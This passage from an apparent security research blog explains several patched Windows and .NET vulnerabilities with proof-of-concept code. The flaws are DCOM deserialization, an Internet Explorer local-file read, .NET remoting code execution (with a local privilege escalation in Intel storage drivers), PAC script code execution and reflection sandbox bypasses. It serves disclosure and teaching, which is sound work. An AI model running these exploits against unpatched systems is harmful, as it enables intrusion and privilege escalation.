Why would I point out the Equals method as well? Well, because it also has a bug, one so difficult to fix that Microsoft has basically thrown up its hands and given up on managed DCOM. They've mitigated the issue in the ClickOnce deployment service (CVE-2014-4073) by reimplementing the DCOM object in native code, but as far as I'm aware they've not fixed the underlying issue.

To understand the problem we have to go back to CVE-2014-0257 and understand why it worked. When the GetType method returns a System.Type instance over DCOM it wraps the object in a COM Callable Wrapper (CCW). This looks to the COM infrastructure like a normal pass-by-reference object, so the Type instance stays in the original process (say the ClickOnce service) but exposes the remote COM interfaces to the caller. The Type class is marked as Serializable, so why doesn't the CCW implement IMarshal and custom-marshal the object to the caller? Because it would be a pretty rude thing to do; it would force the CLR to be loaded into a process just because it happened to be communicating with a .NET DCOM server.

If you implement similar code in C#, though, things change. The result of calling GetType is a local instance of the Type class. How does .NET know how to do this? This is where the IManagedObject interface gets involved. Every CCW implements the IManagedObject interface, which has two methods: GetObjectIdentity, which is used to determine if the object exists in the same AppDomain, and GetSerializedBuffer which, well, I guess the name describes itself.

When a .NET client receives a COM object it tries to see if it's really a .NET object in disguise. To do this it calls QueryInterface for IManagedObject; if that succeeds it will then call GetObjectIdentity to see if it's already in the same AppDomain (if so it can just call it directly). Finally it will call GetSerializedBuffer; if the wrapped .NET object is Serializable, the client will receive a serialized version of the object which it can recreate using the BinaryFormatter class. Yes, that BinaryFormatter class.

Oh crap!
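For reference, this is roughly what the interface looks like, reconstructed from memory of mscoree.idl; treat the exact marshalling as an approximation:

using System;
using System.Runtime.InteropServices;

[ComImport]
[Guid("C3FCC19E-A970-11d2-8B5A-00A0C9B7C9C4")]
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
interface IManagedObject
{
    void GetSerializedBuffer([MarshalAs(UnmanagedType.BStr)] out string buffer);
    void GetObjectIdentity([MarshalAs(UnmanagedType.BStr)] out string guid,
                           out int appDomainId, out int ccw);
}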

This of course works in reverse: if a COM client passes a .NET object to a DCOM server it can cause arbitrary BinaryFormatter deserialization in the server. The Equals method will accept any object by design, so by passing a malicious serializable .NET object to Equals you can end up doing fun things like reflecting an arbitrary Delegate over the DCOM interface. As you can imagine, that's bad.

At this point I'll direct you to the exploit code, which should make everything clearer, or not. There's actually a lot more to the exploit than it seems :-)

When's document.URL not document.URL? (CVE-2014-6340)

I don't tend to go after cross-origin bugs in web browsers; after all, XSS is typically far easier to find (*disclaimer* I don't go after XSS either), but sometimes they're fun. Internet Explorer is a special case: most web browsers don't make much of a distinction between origins for security purposes, but IE does. Its zone mechanisms can make cross-origin bugs interesting, especially when they interact with ActiveX plugins. The origin *ahem* of CVE-2014-6340 came from some research into a site-locking ActiveX plugin. I decided to see if I could find a generic way of bypassing the site-lock and found a bug in IE which has existed since at least IE6.

Let's start with how an ActiveX control will typically site-lock, as in only allow the control to be interacted with if hosted on a page from a particular domain. When an ActiveX control is instantiated it's passed a "site" object which represents the container of the ActiveX control, for example through implementing IObjectWithSite::SetSite or IOleObject::SetClientSite. Given the site object, the well-known way of getting the hosting page's URL is to call the IHTMLDocument2::get_URL method with code similar to the following:
IOleClientSite* pOleClientSite;
IOleContainer* pContainer;

pOleClientSite->GetContainer(&pContainer);

IHTMLDocument2* pHtmlDoc;

pContainer->QueryInterface(IID_PPV_ARGS(&pHtmlDoc));

BSTR bstrURL;

pHtmlDoc->get_URL(&bstrURL);

// We now have the hosting URL.

Anything which is based on the published Microsoft site-locking template code does something similar. So we can conclude that for a site-locking ActiveX control the document.URL property is important. Even though this is a DOM property it's implemented at the native code level, so you can't use Javascript to override it. So I guess we need to dig into MSHTML to find out where the URL value comes from. Bringing up the function in IDA led me to the following:



One of the first things IHTMLDocument2::get_URL calls is CMarkup::GetMarkupPrintUri, but what was most interesting was that if this returned successfully it exited the function with a successful return code. Of course, if you look at the code flow it only enters that block of code if the markup document object returned from CDocument::Markup has bit 1 set at byte offset 0x31. So where does that get set? Well, annoyingly, 0x31 is hardly a rare number so doing an immediate search in IDA was a pain; still, eventually I found where you could set it: in the IHTMLDocument4::put_media function:


Still clearly that function must be documented? Nope, not a bit of it:



Well, I could go on but I'll cut the story short for sanity's sake. What the media property does is set whether the document is currently an HTML document or a print template. It turns out this is an old property which probably should never be used, but it's one of those things which is kept around for legacy purposes. As long as you convert the current document to a print template, using the OLECMDID_SETPRINTTEMPLATE command to ExecWB on the web browser, this code path will execute.

The final step is working out how you influence the URL property. After a bit of digging you'll find the following code in CMarkup::FindMarkupPrintUri:



Hmm, well, it seems to be reading the attribute __IE_DisplayURL from the top element of the document and returning that as the URL. Okay, let's try that, using something like XMLHttpRequest to see if we can read local files. For example:

<html __IE_DisplayURL="file:///c:/">
<body>
<h1>
PoC for IE_DisplayURL Issue</h1>
<object border="1" classid="clsid:8856f961-340a-11d0-a96b-00c04fd705a2" id="obj">NO OBJECT</object>
<script>
try {
// Set document to a print template
var wb = document.getElementById("obj").object;
wb.ExecWB(51, 0, true);

// Enable print media mode
document.media = "print";

// Read a local file
var x = new ActiveXObject("msxml2.xmlhttp");
x.open("GET", "file:///c:/windows/win.ini", false);
x.send();
alert(x.responseText);

// Disable again to get scripting back (not really necessary)
document.media = "screen";

} catch(e) {
alert(e.message);
}
</script>
</body>
</html>
This example only works when running in the Intranet Zone because it requires the ability to script the web browser. Can it be done from the Internet Zone? Probably ;-) In the end Microsoft classed this as an information disclosure, but is it? Well, probably in a default installation of Windows, but mix in third-party ActiveX controls and you have yourself the potential for RCE. Perhaps sit back with a cup of *Coffee* and think about what ActiveX controls might be interesting to play with ;-)

Stupid is as Stupid Does When It Comes to .NET Remoting

Finding vulnerabilities in .NET is something I quite enjoy, it generally meets my criteria of only looking for logic bugs. Probably the first research I did was into .NET serialization where I got some interesting results, and my first Blackhat USA presentation slot. One of the places where you could abuse serialization was in .NET remoting, which is a technology similar to Java RMI or CORBA to access .NET objects remotely (or on the same machine using IPC). Microsoft consider it a legacy technology and you shouldn't use it, but that won't stop people.

One day I came to the realisation that while I'd talked about how dangerous it was I'd never released any public PoC for exploiting it. So I decided to start writing a simple tool to exploit vulnerable servers, that was my first mistake. As I wanted to fully understand remoting to write the best tool possible I decided to open my copy of Reflector, that was my second mistake. I then looked at the code, sadly that was my last mistake.

TL;DR you can just grab the tool and play. If you want a few of the sordid details of CVE-2014-1806 and CVE-2014-4149 then read on.

.NET Remoting Overview

Before I can describe what the bug is I need to describe how .NET remoting works a little bit. Remoting was built into the .NET framework from the very beginning. It supports a pluggable architecture where you can replace many of the pieces, but I'm just going to concentrate on the basic implementation and what's important from the perspective of the bug. MSDN has plenty of resources which go into a bit more depth and there's always the official documentation MS-NRTP and MS-NRBF. A good description is available here.

The basic model of .NET remoting is that you have a server class derived from MarshalByRefObject. This indicates to the .NET framework that this object can be called remotely. The server code can publish this server object using the remoting APIs, such as RemotingConfiguration.RegisterWellKnownServiceType. On the client side a call can be made to APIs such as Activator.GetObject, which will establish a transparent proxy for the client. When the client makes a call on this proxy, the method information and parameters are packaged up into an object which implements the IMethodCallMessage interface. This object is sent to the server, which processes the message, calls the real method and returns the return value (or exception) inside an object which implements the IMethodReturnMessage interface.
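A minimal sketch of that model (class and channel names here are my own invention, not from any real service):

using System;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Ipc;

// The server class; deriving from MarshalByRefObject makes it remotable.
public class HelloServer : MarshalByRefObject
{
    public string Hello(string name) { return "Hello " + name; }
}

class ServerProgram
{
    static void Main()
    {
        ChannelServices.RegisterChannel(new IpcChannel("MyChannel"), false);
        RemotingConfiguration.RegisterWellKnownServiceType(
            typeof(HelloServer), "Object.rem", WellKnownObjectMode.Singleton);
        Console.ReadLine(); // keep the server alive
    }
}

The client side is then just:

HelloServer proxy = (HelloServer)Activator.GetObject(
    typeof(HelloServer), "ipc://MyChannel/Object.rem");
proxy.Hello("world"); // packaged into an IMethodCallMessage under the hood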

When a remoting session is constructed we need to create a couple of Channels, a Client Channel for the client and a Server Channel for the server. Each channel contains a number of pluggable components called sinks. A simple example is shown below:


The transport sinks are unimportant for the vulnerability. These sinks are used to actually transport the data in some form, for example as binary over TCP. The important things to concentrate on from the perspective of the vulnerabilities are the Formatter Sinks and the StackBuilder Sink.

Formatter sinks take the IMethodCallMessage or IMethodReturnMessage objects and format their contents so that they can be sent across the transport. They're also responsible for unpacking the result at the other side. As the operations are asymmetric from the channel perspective there are two different formatter sink interfaces, IClientChannelSink and IServerChannelSink.

While you can select your own formatter sink the framework will almost always give you a formatter based on the BinaryFormatter object which as we know can be pretty dangerous due to the potential for deserialization bugs. The client sink is implemented in BinaryClientFormatterSink and the server sink is BinaryServerFormatterSink.

The StackBuilder sink is an internal-only class implemented by the framework for the server. Its job is to unpack the IMethodCallMessage information, find the destination server object to call, verify the security of the call, call the server and finally package up the return value into the IMethodReturnMessage object.

This is a very high level overview, but we'll see how this all interacts soon.

The Exploit

Okay so on to the actual vulnerability itself, let's take a look at how the BinaryServerFormatterSink processes the initial .NET remoting request from the client in the ProcessMessage method:

IMessage requestMsg;
PermissionSet set = null; // declaration elided from the original decompile

if (this.TypeFilterLevel != TypeFilterLevel.Full)
{
    set = new PermissionSet(PermissionState.None);
    set.SetPermission(
        new SecurityPermission(SecurityPermissionFlag.SerializationFormatter));
}
try
{
    if (set != null)
    {
        set.PermitOnly();
    }
    requestMsg = CoreChannel.DeserializeBinaryRequestMessage(uRI, requestStream,
        _strictBinding, TypeFilterLevel);
}
finally
{
    if (set != null)
    {
        CodeAccessPermission.RevertPermitOnly();
    }
}
We can see in this code that the request data from the transport is thrown into DeserializeBinaryRequestMessage. The code around it relates to the serialization type filter level, which I'll describe later. So what's that method doing?
internal static IMessage DeserializeBinaryRequestMessage(string objectUri,
    Stream inputStream, bool bStrictBinding, TypeFilterLevel securityLevel)
{
    BinaryFormatter formatter = CreateBinaryFormatter(false, bStrictBinding);
    formatter.FilterLevel = securityLevel;
    UriHeaderHandler handler = new UriHeaderHandler(objectUri);
    return (IMessage) formatter.UnsafeDeserialize(inputStream,
        new HeaderHandler(handler.HeaderHandler));
}

For all intents and purposes it isn't doing a lot. It's passing the request stream to a BinaryFormatter and returning the result. The result is cast to an IMessage interface and the object is passed on for further processing. Eventually it ends up passing the message to the StackBuilder sink, which verifies the method being called is valid then executes it. Any result is passed back to the client.

So now for the bug: it turns out that nothing checked that the result of the deserialization was a local object. Could we instead insert a remote IMethodCallMessage object into the serialized stream? It turns out yes, we can. Serializing an object which implements the interface but is also derived from MarshalByRefObject serializes an instance of an ObjRef class which points back to the client.

But why would this be useful? Well, it turns out there's a time-of-check time-of-use vulnerability if an attacker can return different results from the MethodBase property. By returning a MethodBase for Object.ToString (which is always allowed) at some points, it will trick the server into dispatching the call. Then, once the StackBuilder sink goes to dispatch the method, we replace it with something more dangerous, say Process.Start instead. And you've just got arbitrary code execution in the remoting service.

In order to actually exploit this you pretty much need to implement most of the remoting code manually; fortunately it is documented, so that doesn't take very long. You can repurpose the existing .NET BinaryFormatter code to do most of the other work for you. I'd recommend taking a look at the github project for more information on how this all works.

So that was CVE-2014-1806, but what about CVE-2014-4149? Well, it's the same bug; MS didn't fix the TOCTOU issue, instead they added a call to RemotingServices.IsTransparentProxy just after the deserialization. Unfortunately that isn't the only way you can get a remote object from deserialization. .NET supports quite extensive COM interop, and as luck would have it all the IMessage interfaces are COM accessible. So instead of a remoting object we instead inject a COM implementation of the IMethodCallMessage interface (which, ironically, can be written in .NET anyway). This works best locally as then you don't need to worry so much about COM authentication, but it should work remotely. The final fix was to check whether the object returned is an instance of MarshalByRefObject, as it turns out that the transparent COM object, System.__ComObject, is derived from that class, as are transparent proxies.

Of course if the service is running with a TypeFilterLevel set to Full then even with these fixes the service can still be vulnerable. In this case you can deserialize anything you like in the initial remoting request to the server. Then, using object reflection tricks, you can capture FileInfo or DirectoryInfo objects which give access to the filesystem with the privileges of the server. The reason you can do this is that these objects are both serializable and derive from MarshalByRefObject. So you can send them to the server serialized, but when the server tries to reflect them back to the client they end up staying in the server as remote objects.

Real-World Example

Okay, let's see this in action in a real-world application. I bought a computer a few years back which had the Intel Rapid Storage Technology drivers version 11.0.0.1032 pre-installed (the specific version can be downloaded here). This contains a vulnerable .NET remoting server which we can exploit locally to get local system privileges. A note before I continue: from what I can tell the latest versions of these drivers no longer use .NET remoting for the communication between the user client and the server, so I've never contacted Intel about the issue. That said, there's no automatic update process, so if, like me, you had the original insecure version installed, well, you have a trivial local privilege escalation on your machine :-(

Bringing up Reflector and opening the IAStorDataMgrSvc.exe application (which is the local service) we can find the server side of the remoting code below:

public void Start()
{
    BinaryServerFormatterSinkProvider serverSinkProvider =
        new BinaryServerFormatterSinkProvider {
            TypeFilterLevel = TypeFilterLevel.Full
        };
    BinaryClientFormatterSinkProvider clientSinkProvider = new BinaryClientFormatterSinkProvider();
    IdentityReferenceCollection groups = new IdentityReferenceCollection();

    IDictionary properties = new Hashtable();
    properties["portName"] = "ServerChannel";
    properties["includeVersions"] = "false";
    mChannel = new IpcChannel(properties, clientSinkProvider, serverSinkProvider);
    ChannelServices.RegisterChannel(mChannel, true);
    mServerRemotingRef = RemotingServices.Marshal(mServer,
        "Server.rem", typeof(IServer));
    mEngine.Start();
}

So there are a few things to note about this code. It is using IpcChannel, so it's going over named pipes (reasonable for a local service). It's setting the portName to ServerChannel; this is the name of the named pipe on the local system. It then registers the channel with the secure flag set to true, and finally it configures an object with the well-known name of Server.rem which will be exposed on the channel. Also worth noting, it is setting the TypeFilterLevel to Full; we'll get back to that in a minute.

For exploitation purposes we can therefore build the service URL as ipc://ServerChannel/Server.rem. So let's try sending it a command. In this case I had updated for the fix to CVE-2014-1806 but not for CVE-2014-4149, so we need to pass the -usecom flag to use a COM return channel.


Well, that was easy: direct code execution at local system privileges. But of course if we now update to the latest version it will stop working again. Fortunately, though, I highlighted that they were setting the TypeFilterLevel to Full. This means we can still attack it using arbitrary deserialization. So let's try and do that instead:


In this case we know the service's directory and can upload our custom remoting server to the same directory the server executes from. This allows us to get full access to the system. Of course if we don't know where the server is we can still use the -useser flag to list and modify the file system (with the privileges of the server) so it might still be possible to exploit even if we don't know where the server is running from.

Mitigating Against Attacks

I can't be 100% certain there aren't other ways of exploiting this sort of bug; at the least I can't rule out bypassing the TypeFilterLevel stuff through one trick or another. Still, there are definitely a few ways of mitigating it. One is to not use remoting; MS has deprecated the technology in favour of WCF, but isn't getting rid of it yet.

If you have to use remoting you could use secure mode with user account checking. Also, if you have complete control over the environment, you could randomise the service name per deployment, which would at least prevent mass exploitation. An outbound firewall would also come in handy to block outgoing back channels.


Old .NET Vulnerability #1: PAC Script RCE (CVE-2012-4776)

This is the start of a very short series on some of my old .NET vulnerabilities which have been patched. Most of these issues have never been publicly documented, or at least there have been no PoCs made available. Hopefully it's interesting to some people.

The first vulnerability I'm going to talk about is CVE-2012-4776 which was fixed in MS12-074. It was an issue in the handling of Web Proxy Auto-Configuration (PAC) scripts. It was one of the only times that MS has ever credited me with an RCE in .NET since they made it harder to execute .NET code from IE. Though to be fair making it harder might be partially my fault.

The purpose of a PAC script, if you've never encountered one before, is to allow a web client to run some proxy decision logic before it connects to a web server. An administrator can configure the script to make complex decisions on how outbound connections are made, for example forcing all external web sites through a gateway proxy while letting Intranet connections go direct to the server. You can read all about it on Wikipedia and many other sites as well, but the crucial thing to bear in mind is that the PAC script is written in Javascript. The most basic PAC script you can create is as follows:
function FindProxyForURL(url, host) {
// Always return no proxy setting
return "DIRECT";
}
On Windows if you use the built-in HTTP libraries such as WinINET and WinHTTP you don't need to worry about these files yourself, but if you roll your own HTTP stack, like .NET does, you'd be on your own to reimplement this functionality. So when faced with this problem what to do? If you answered, "let's use a .NET implementation of Javascript" you'd be correct. Some people don't realise that .NET comes with its own implementation of Javascript (JScript for licensing reasons). It even comes with a compiler, jsc.exe, installed by default.
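If you want to play along, compiling a script to an executable is a one-liner (test.js being a hypothetical script file; jsc.exe lives under the framework directory, e.g. %windir%\Microsoft.NET\Framework\v2.0.50727):

jsc.exe /out:test.exe test.js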

While I was having a look at .NET, evaluating anything interesting which asserts full trust permissions I came across the .NET PAC implementation. The following method is from the System.Net.VsaWebProxyScript class in the Microsoft.JScript assembly (some code removed for brevity):
[PermissionSet(SecurityAction.Assert, Name="FullTrust")]
public bool Load(Uri engineScriptLocation, string scriptBody, Type helperType)
{
try
{
engine = new VsaEngine();
engine.RootMoniker = "pac-" + engineScriptLocation.ToString();
engine.Site = new VsaEngineSite(helperType);
engine.InitNew();
engine.RootNamespace = "__WebProxyScript";

StringBuilder sb = new StringBuilder();
sb.Append("[assembly:System.Security.SecurityTransparent()] ...");
sb.Append("class __WebProxyScript { ... }\r\n");
sb.Append(scriptBody);
IVsaCodeItem item2 = engine.Items.CreateItem("SourceText",
VsaItemType.Code, VsaItemFlag.None) as IVsaCodeItem;
item2.SourceText = sb.ToString();

if (engine.Compile())
{
engine.Run();
scriptInstance = Activator.CreateInstance(
engine.Assembly.GetType("__WebProxyScript.__WebProxyScript"));
CallMethod(scriptInstance, "SetEngine", new object[] { engine });
return true;
}
}
catch
{
}
return false;
}
The code is taking the PAC script from the remote location as a string, putting it together with some boilerplate code to implement the standard PAC functions and compiling it to an assembly. This seems too good to be true from an exploit perspective. It was time to give it a try, so I configured a simple .NET application with a PAC script by adding the following configuration to the application:
<configuration>
<system.net>
<defaultProxy>
<proxy
autoDetect="true"
scriptLocation="http://127.0.0.1/test.js"
/>
</defaultProxy>
</system.net>
</configuration>
Of course in a real-world scenario the application probably isn't going to be configured like this. Instead the proxy settings might be configured through WPAD, which is known to be spoofable, or through the system settings. When the application makes a connection using the System.Net.WebClient class it will load the PAC file from the scriptLocation and execute it.
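The test harness itself needs nothing more than a request which triggers proxy resolution; something like this sketch (the URL is just a placeholder):

using System;
using System.Net;

class Harness {
    static void Main() {
        // Any WebClient request causes the configured PAC script to be
        // fetched and evaluated to decide on a proxy.
        WebClient client = new WebClient();
        client.DownloadString("http://www.example.com/");
    }
}

With a test harness ready let's try a few things: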
import System;

function FindProxyForURL(url, host) {
Console.WriteLine("Hello World!");
return "DIRECT";
}
This printed out "Hello World!" as you'd expect, so we can compile and execute JScript.NET code. Awesome. So let's go for the win!
import System.IO;

function FindProxyForURL(url, host) {
File.WriteAllText("test.txt", "Hello World!");
return "DIRECT";
}
And... it fails, silently I might add :-( I guess we need to get to the bottom of this. When dealing with the internals of the framework I usually find it easiest to get WinDBG involved. All .NET frameworks come with a handy debugger extension, SOS, which we can use to do low-level debugging of .NET code. A quick tutorial, open the .NET executable in WinDBG and run the following two lines at the console.
sxe clr
sxe -c ".loadby sos mscorwks; gh" ld:mscorwks
What these lines do is set WinDBG to stop on a CLR exception (.NET uses Windows SEH under the hood to pass on exceptions) and adds a handler to load the SOS library when the DLL mscorwks gets loaded. This DLL is the main part of the CLR, we can't actually do any .NET debugging until the CLR is started. As a side note, if this was .NET 4 and above replace mscorwks with clr as that framework uses clr.dll as its main implementation.

Restarting the execution of the application we wait for the debugger to break on the CLR exception. Once we've broken into the debugger you can use the SOS command !pe to dump the current exception:


Well no surprises, we got a SecurityException trying to open the file we specified. Now at this point it's clear that the PAC script must be running in Partial Trust (PT). This isn't necessarily an issue as I still had a few PT escapes to hand, but would be nice not to need one. By dumping the call stack using the !clrstack command we can see that the original caller was System.Net.AutoWebProxyScriptWrapper. 

Looking at the class it confirms our suspicions of being run in PT. In the class's CreateAppDomain method it creates an Internet security AppDomain, which is going to be pretty limited in permissions, then initializes the System.Net.VsaWebProxyScript object inside it. As that class derives from MarshalByRefObject it doesn't leave the restricted AppDomain. Still in situations like this you shouldn't be disheartened, let's go back and look at how the assembly was being loaded into memory. We find it's being loaded from a byte array (maybe bad) but passing a null for the evidence parameter (awesome). As we can see in the remarks from Assembly.Load this is a problem:
When you use a Load method overload with a Byte[] parameter to load a COFF image, 
evidence is inherited from the calling assembly. This applies to the .NET Framework 
version 1.1 Service Pack 1 (SP1) and subsequent releases.
So what we end up with is an assembly which inherits its permissions from the calling assembly. The calling assembly is trusted framework code, which means our compiled PAC code is also trusted code. So why doesn't the file function work? Well you have to remember how security in AppDomains interacts with the security stack walk when a demand for a permission is requested.

The transition between the trusted and the untrusted AppDomains acts as a PermitOnly security boundary. What this means is that even if every caller on the current stack is trusted, if no-one asserts higher permissions than the AppDomain's current set then a demand would fail as shown in the below diagram:



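To make that concrete, here's a hedged sketch of the same situation using the standard .NET 4 sandboxing API (the classes and names are mine, not the framework's): code running in a limited-grant AppDomain fails a demand even though every assembly on the stack is fully trusted.

using System;
using System.Security;
using System.Security.Permissions;

public class Sandboxed : MarshalByRefObject {
    public void TryDemand() {
        // Everything on the stack here is trusted, but the AppDomain's
        // grant set caps the result, so this throws SecurityException
        // unless a caller asserts the permission first.
        new FileIOPermission(PermissionState.Unrestricted).Demand();
    }
}

public class Program {
    public static void Main() {
        // A grant set with execution only, much like an Internet-zone domain.
        PermissionSet grant = new PermissionSet(PermissionState.None);
        grant.AddPermission(new SecurityPermission(SecurityPermissionFlag.Execution));
        AppDomain domain = AppDomain.CreateDomain("sandbox",
            AppDomain.CurrentDomain.Evidence,
            new AppDomainSetup { ApplicationBase = AppDomain.CurrentDomain.BaseDirectory },
            grant);
        Sandboxed sandboxed = (Sandboxed)domain.CreateInstanceAndUnwrap(
            typeof(Sandboxed).Assembly.FullName, typeof(Sandboxed).FullName);
        sandboxed.TryDemand(); // SecurityException despite trusted callers.
    }
}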
There are plenty of ways around this situation, in fact we'll see a few in my next post on this topic. But for now there's an easy way past this issue, all we need is something to assert suitable permissions for us while we run our code. Turns out it was there all along, the original Load method uses the attribute form of permission assertion to assert full trust.
[PermissionSet(SecurityAction.Assert, Name="FullTrust")]
We can get code to run in that method because the loading of the assembly will execute any global JScript code automatically, so a quick modification and we get privileged execution:
import System.IO;

File.WriteAllText("test.txt", "Hello World!");

function FindProxyForURL(url, host) {
return "DIRECT";
}
Why couldn't we have just done a new PermissionSet(PermissionState.Unrestricted).Assert() here? Well if you look at the code being generated for compilation it sets the SecurityTransparent assembly attribute. This tells the CLR that this code isn't allowed to elevate its permissions, but is transparent to security decisions. If you have a trusted assembly which is transparent it doesn't affect the stack walk at all, but it also cannot assert higher permissions. This is why the assertion in the Load method was so important. Of course this assertion was what originally led me to finding the code in the first place.

Microsoft fixed this in two ways. First they "fixed" the JScript code to not execute under a privileged permission set, as well as passing an appropriate evidence object to the assembly load. And secondly they basically blocked use of JScript.NET by default (see the notes in the KB article here). If you ever find a custom implementation of PAC scripts in an application it's always worth a quick look to see what they're using.


Old .NET Vulnerability #2+3: Reflection Delegate Binding Bypass (CVE-2012-1895 and CVE-2013-3132)

Reflection is a very useful feature of frameworks such as .NET and Java, but it has interesting security issues when you're trying to sandbox code. One which is well known is how much the framework will try to emulate the normal caller visibility scoping for reflection APIs which would exist if the code was compiled. Perhaps that needs a bit of explanation, imagine you have a C# class which looks something like the following:
public class UnsafeMemory {
IntPtr _ptr;
ushort _size;

public UnsafeMemory(ushort size) {
_ptr = Marshal.AllocCoTaskMem(size);
_size = size;
}

public byte ReadByte(ushort ofs) {
if (ofs < _size) {
return Marshal.ReadByte(_ptr, ofs);
}

return 0;
}
}

This has a sensitive field, a pointer to a locally allocated memory structure which we don't want people to change. The built-in accessors don't allow you to specify anything other than size (which is also sensitive, but slightly less so). Still reflection allows us to change this from a fully trusted application easily enough:
UnsafeMemory mem = new UnsafeMemory(1000);
FieldInfo fi = typeof(UnsafeMemory).GetField("_ptr",
BindingFlags.NonPublic | BindingFlags.Instance);

fi.SetValue(mem, new IntPtr(0x12345678));

As we've set the pointer, we can now read and write to arbitrary memory addresses. Flushed with success we try this in our partially trusted application and we get:
System.FieldAccessException: Attempt by method
'ReflectionTests.Program.Main()' to
access field 'ReflectionTests.UnsafeMemory._ptr' failed.
at System.Reflection.RtFieldInfo.PerformVisibilityCheckOnField()
at System.Reflection.RtFieldInfo.InternalSetValue()
at System.Reflection.RtFieldInfo.SetValue()
at System.Reflection.FieldInfo.SetValue()
at ReflectionTests.Program.Main()

Well that sucks! PerformVisibilityCheckOnField is implemented by the CLR so we can't easily look at its implementation (although it's in the SSCLI). But I think we can guess what the method is doing. The CLR is checking who's calling the SetValue method and verifying the visibility rules for the field. As the field is private only the declaring class should be able to set it via reflection; we can verify that easily enough. Let's modify the class slightly to add a new method:
public static void TestReflection(FieldInfo fi, object @this, object value) {
fi.SetValue(@this, value);
}

If we call that method from our partial trust code it succeeds, thus confirming our assumptions about the visibility check. This can be extended to any reflection artefact, properties, methods, constructors, events etc. Still the example method is hardly going to be a very common coding pattern, so instead let's think more generally about visibility in the .NET framework to see if we can find a case where we can easily bypass the visibility.  There are actually many different visibility levels in the CLR which can be summarised as:
Name in CLR        Name in C#          Visibility
Public             public              Anybody
Family             protected           Current class and derived classes
FamilyAndAssembly  No Equivalent       Current class or derived classes in same assembly
FamilyOrAssembly   protected internal  Current class and derived classes or assembly
Assembly           internal            Current assembly
Private            private             Current class

Of most interest is Assembly (internal in C#), as you only have to take a quick peek at something like mscorlib to see that this visibility is used a lot to protect sensitive classes and methods by localizing them to the current assembly. The Assembly visibility rule means that any class in the same assembly can access the field or method. When dealing with something like mscorlib, which has at least 900 public classes, you can imagine that would give you something you could exploit. Turns out a good one to look at is the handling of delegates, if only for one reason: you can get them to call a method with the caller set to something in mscorlib, by using asynchronous dispatch.

For example if we run the following code we can get the calling method from the delegate; this correctly removes methods which the CLR considers to be part of the delegate dispatch.
Func<MethodBase> f = new Func<MethodBase>(() => 
new StackTrace().GetFrame(1).GetMethod());
MethodBase method = f();

Console.WriteLine("{0}::{1}", method.DeclaringType.FullName, method.Name);

OUTPUT: ReflectionTests.Program::Main

Not really surprising, the caller was our Main method. Okay now what if we change that to using asynchronous dispatch, using BeginInvoke and EndInvoke?
Func<MethodBase> f = new Func<MethodBase>(() => 
new StackTrace().GetFrame(1).GetMethod());

IAsyncResult ar = f.BeginInvoke(null, null);
MethodBase method = f.EndInvoke(ar);

Console.WriteLine("{0}::{1}", method.DeclaringType.FullName, method.Name);

OUTPUT: System.Runtime.Remoting.Messaging.StackBuilderSink::_PrivateProcessMessage

How interesting, the code thinks the caller's an internal method to mscorlib, hopefully you can see where I'm going with this? Okay let's put it all together: let's create a delegate pointing to FieldInfo.SetValue, call it via asynchronous dispatch and it's time to party.
Action<object, object> set_info = new Action<object,object>(fi.SetValue);

IAsyncResult ar = set_info.BeginInvoke(mem, new IntPtr(0x12345678), null, null);
set_info.EndInvoke(ar);

This works as expected with full trust, but running it under partial trust we get the dreaded SecurityException:
System.Security.SecurityException: Request for the permission 
of type 'System.Security.Permissions.ReflectionPermission' failed.
at System.Delegate.DelegateConstruct()
at ReflectionTests.Program.Main()

So why is this the case? Well the developers of .NET weren't stupid, they realised being able to call a reflection API using another reflection API (which delegates effectively are) is a security hole waiting to happen. So if you try and bind a delegate to a certain set of methods it will demand ReflectionPermission first to check if you're allowed to do it. Still, while I said they weren't stupid, I didn't mean they don't make mistakes, as this is the crux of the two vulnerabilities I started writing this blog post about :-)

The problem comes down to this: what methods you can or cannot bind to is just a blacklist. Each method is allocated a set of invocation flags represented by the System.Reflection.INVOCATION_FLAGS enumeration. Perhaps the most important one from our perspective is the INVOCATION_FLAGS_FIELD_SPECIAL_CAST flag. This is a bit strangely named, but what it indicates is that the method should be double checked if it's ever invoked through a reflection API. If we look at FieldInfo.SetValue we'll find it has the flag set.

Okay so the challenge is simple, just find a method which is equivalent to SetValue but isn't FieldInfo.SetValue. It turns out that FieldInfo implements the interface System.Runtime.InteropServices._FieldInfo which is a COM interface for accessing the FieldInfo object. It just so happened that someone forgot to add this interface's methods to the blacklist. So let's see a real PoC by abusing the WeakReference class and its internal m_handle field:
// Create a weak reference to 'tweakme'
string s = "tweakme";
WeakReference weakRef = new WeakReference(s);

// Get field info for GC handle
FieldInfo f = typeof(WeakReference).GetField("m_handle",
BindingFlags.NonPublic | BindingFlags.Instance);

MethodInfo miSetValue = typeof(_FieldInfo).GetMethod("SetValue",
BindingFlags.Public | BindingFlags.Instance, null,
new Type[2] { typeof(object), typeof(object) }, null);

Action<object, object> setValue = (Action<object, object>)
Delegate.CreateDelegate(typeof(Action<object, object>),
f, miSetValue);

// Set garbage value in handle
setValue.EndInvoke(setValue.BeginInvoke(weakRef,
new IntPtr(0x0c0c0c0c), null, null));

// Crashes here with a read AV on 0x0c0c0c0c
Console.WriteLine(weakRef.Target.ToString());

CVE-2012-1895 covered the issue with all similar COM interfaces, such as _MethodInfo, _Assembly and _AppDomain. So I sent it over to MS and it was fixed. But of course even though you point out a security weakness in one part of the code it doesn't necessarily follow that they'll fix it everywhere. So a few months later I found that the IReflect interface has an InvokeMember method which was similarly vulnerable. This ended up as CVE-2013-3132, and by that point I gave up looking :-)

As a final note there was a similar issue which never got a CVE, although it was fixed. You could exploit it using something like the following:
MethodInfo mi = typeof(Delegate).GetMethod("CreateDelegate", 
BindingFlags.Public | BindingFlags.Static,
null, new Type[] { typeof(Type), typeof(MethodInfo) }, null);

Func<Type, MethodInfo, Delegate> func = (Func<Type, MethodInfo, Delegate>)
Delegate.CreateDelegate(typeof(Func<Type, MethodInfo, Delegate>), mi);

Type marshalType = Type.GetType("System.Runtime.InteropServices.Marshal");
MethodInfo readByte = marshalType.GetMethod("ReadByte",
BindingFlags.Public | BindingFlags.Static,
null, new Type[] { typeof(IntPtr) }, null);

IAsyncResult ar = func.BeginInvoke(typeof(Func<IntPtr, byte>), readByte, null, null);
Func<IntPtr, byte> r = (Func<IntPtr, byte>)func.EndInvoke(ar);

r(new IntPtr(0x12345678));

It's left as an exercise for the reader to understand why that works (hint: it isn't a scope issue as Marshal.ReadByte is public). I'll describe it in more detail next time.

Starting WebClient Service Programmatically

